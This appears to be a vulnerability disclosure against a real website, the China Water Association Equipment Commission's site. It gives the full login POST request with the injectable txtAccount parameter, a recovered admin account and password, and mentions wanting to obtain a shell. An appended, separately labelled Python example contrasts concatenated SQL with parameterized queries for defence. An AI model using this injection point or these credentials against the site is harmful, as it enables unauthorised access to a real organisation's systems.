SQL injection in the China Water Association Equipment Commission's website
China Water Association equipment network - China Water Industry Authority - China Water Association Equipment Commission's website: SQL injection allows logging in to the website's management back end and managing the website.
POST injection (parameter txtAccount):
POST /userlogin.aspx?url=/magzartlist.aspx?mcid=2 HTTP/1.1
Accept: text/html, application/xhtml+xml, image/jxr, */*
Referer: http://**.**/userlogin.aspx?mid=11&url=/magzartlist.aspx?mcid=3
Accept-Language: zh-CN
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Content-Length: 74
Host: **.**.**.**
Pragma: no-cache
Cookie: ASP.NET_SessionId=x1kmv145jo5zcd45nrbomr45

txtAccount=admin&txtPwd=admin&txtValCode=14281&cbSaveAccount=true&x=53&y=7
Database:
Database tables:
Database dump:
Check whether a record exists, and look up the password hash value.
Account: zhangyao, password: zhangyao
Login successful.
This account is able to manage the website. No further attempts have been made; getting a shell is something I am still learning.
Solution:
Filter the input and change the password.
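
The fix for the txtAccount injection, as an added example that is not part of the original report or the site's code: the login lookup with the account value concatenated into the SQL text, next to the same lookup with the value bound as a parameter. It uses Python's sqlite3 as an offline stand-in for the ASP.NET handler; the table, column names and sample account are constructed assumptions.

```python
import hashlib
import hmac
import os
import sqlite3

def hash_password(password, salt):
    # Salted, slow hash so stored values are not directly reusable.
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)

def make_db():
    """In-memory stand-in for the account table (schema and row are constructed)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (account TEXT PRIMARY KEY, salt BLOB, pwd_hash BLOB)")
    salt = os.urandom(16)
    db.execute("INSERT INTO users VALUES (?, ?, ?)",
               ("editor01", salt, hash_password("constructed-sample-pass", salt)))
    return db

def _verify(row, password):
    # Constant-time comparison of the stored hash with the submitted password's hash.
    return row is not None and hmac.compare_digest(row[1], hash_password(password, row[0]))

def login_concatenated(db, account, password):
    """'Before' form: txtAccount becomes part of the SQL text itself."""
    sql = "SELECT salt, pwd_hash FROM users WHERE account = '" + account + "'"
    return _verify(db.execute(sql).fetchone(), password)

def login_parameterized(db, account, password):
    """Hardened form: the value is bound as data and never reaches the SQL parser."""
    sql = "SELECT salt, pwd_hash FROM users WHERE account = ?"
    return _verify(db.execute(sql, (account,)).fetchone(), password)

def input_reaches_sql_parser(db, account):
    """True if an ordinary value containing a quote breaks the concatenated query."""
    try:
        login_concatenated(db, account, "irrelevant")
        return False
    except sqlite3.OperationalError:
        return True

if __name__ == "__main__":
    db = make_db()
    name = "o'brien"  # harmless value with an apostrophe
    print("concatenated query broken by input:", input_reaches_sql_parser(db, name))
    print("parameterized login result:", login_parameterized(db, name, "x"))
```

In ADO.NET the equivalent of the bound form is a SqlCommand whose account value is supplied through a SqlParameter rather than string concatenation.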